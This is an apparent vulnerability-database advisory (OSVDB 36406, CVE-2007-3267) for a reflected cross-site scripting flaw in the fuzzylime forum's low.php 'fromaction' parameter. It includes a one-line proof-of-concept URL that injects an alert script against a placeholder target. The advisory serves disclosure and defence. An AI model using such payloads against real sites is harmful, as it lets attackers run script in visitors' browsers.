fuzzylime (forum) low.php log Action fromaction Variable XSS

2007-06-13T11:48:46
ID OSVDB:36406
Type osvdb
Reporter OSVDB
Modified 2007-06-13T11:48:46

Description

Manual Testing Notes

http://[target]/[path]/low.php?action=log&fromforum=111-222-1933email@address.com&fromtopic=111-222-1933email@address.com&fromaction=>">alert(21407654)%3B

References:

Secunia Advisory ID:25653 Related OSVDB ID: 1012926 Related OSVDB ID: 36405 Other Advisory URL: http://www.secvsn.com/content/Advisories/sr-180607-fuzzy.html Other Advisory URL: http://forum.fuzzylime.co.uk/st/content/download/ CVE-2007-3267 Bugtraq ID: 24522